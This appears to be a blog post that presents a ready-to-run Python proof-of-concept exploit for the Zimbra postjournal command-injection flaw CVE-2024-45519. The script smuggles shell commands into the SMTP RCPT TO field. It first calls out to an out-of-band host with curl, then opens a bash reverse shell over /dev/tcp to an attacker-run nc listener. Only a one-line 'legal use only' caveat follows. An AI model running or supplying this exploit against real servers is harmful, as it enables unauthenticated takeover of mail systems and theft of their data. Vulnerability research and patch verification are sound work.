.jpg)
Zimbra - Remote Command Execution (CVE-2024-45519) POC
Zimbra - Remote Command Execution (CVE-2024-45519) Proof Of Concept(POC)
Zimbra, a widely used email and collaboration platform, recently released a critical security update addressing a severe vulnerability in its postjournal service. This vulnerability, identified as CVE-2024-45519, allows unauthenticated attackers to execute arbitrary commands on affected Zimbra installations. In this blog post, we delve into the nature of this vulnerability, our journey in analyzing the patch, and the steps we took to exploit it manually. We also discuss the potential impact and emphasize the importance of timely patch application.
SMTP Vulnerability Exploit Script Overview
This script checks for vulnerabilities in an SMTP server and, if found, exploits the vulnerability by establishing a reverse shell connection to your machine.
Features:
Port Checking:
Verifies if the target SMTP port is open.
Vulnerability Check:Sends a payload to test for vulnerability in the SMTP server.
Exploit & Reverse Shell:If the server is vulnerable, the script executes a reverse shell, allowing you to gain access to the remote machine.
Usage:
Listen on your machine: Before running the script, open a terminal and listen for incoming connections:
bash
nc -lvnp 4444
(Replace 4444 with your chosen port, matching the one in the script.)
Run the script: If the server is vulnerable, it will connect back to your machine, and you will gain control via the terminal.
POC Code:
import socket
def is_port_open(host, port):
try:
sock = socket.create_connection((host, port), timeout=10)
sock.close()
return True
except (socket.timeout, ConnectionRefusedError, OSError):
return Falsedef smtp_payload_check_vulnerability(host, port, oast):
try:
with socket.create_connection((host, port), timeout=10) as conn:
conn.send(b'EHLO localhost\r\n')
conn.recv(1024)conn.send(b'MAIL FROM: <aaaa@mail.domain.com>\r\n')
conn.recv(1024)rcpt_to_payload = f'RCPT TO: <"aabbb$(curl${{IFS}}{oast})"@mail.domain.com>\r\n'.encode()
conn.send(rcpt_to_payload)
conn.recv(1024)conn.send(b'DATA\r\n')
conn.recv(1024)conn.send(b'aaa\r\n.\r\n')
resp = conn.recv(1024)conn.send(b'QUIT\r\n')
return resp.decode('utf-8')except Exception as e:
return f"Error: {str(e)}"def smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port):
reverse_shell = f'/bin/bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
try:
with socket.create_connection((host, port), timeout=10) as conn:
conn.send(b'EHLO localhost\r\n')
conn.recv(1024)conn.send(b'MAIL FROM: <exploit@mail.domain.com>\r\n')
conn.recv(1024)rcpt_to_payload = f'RCPT TO: <"exploit$(bash -c \'{reverse_shell}\')"@mail.domain.com>\r\n'.encode()
conn.send(rcpt_to_payload)
conn.recv(1024)conn.send(b'DATA\r\n')
conn.recv(1024)conn.send(b'Exploit in action\r\n.\r\n')
resp = conn.recv(1024)conn.send(b'QUIT\r\n')
return resp.decode('utf-8')except Exception as e:
return f"Error: {str(e)}"def main():
host = "target.domain.com"
port = 25
oast = "http://your-oast-url.com"
local_ip = "your-local-ip"
local_port = 4444if is_port_open(host, port):
print(f"Port {port} is open on {host}")print("Checking for vulnerability...")
response = smtp_payload_check_vulnerability(host, port, oast)
print("SMTP Response (Vulnerability Check):\n", response)if "message delivered" in response:
print("Vulnerability detected! Proceeding to exploitation...")exploit_response = smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port)
print("SMTP Response (Exploitation - Reverse Shell):\n", exploit_response)else:
print("No vulnerability detected or unable to exploit.")
else:
print(f"Port {port} is closed on {host}")if __name__ == "__main__":
main()
File Link
Important Notes
Legal Use Only: This script should only be used on systems where you have explicit permission to test for vulnerabilities.
Correct IP Configuration: Ensure the script uses your correct IP address, particularly your public IP if working outside a local network.
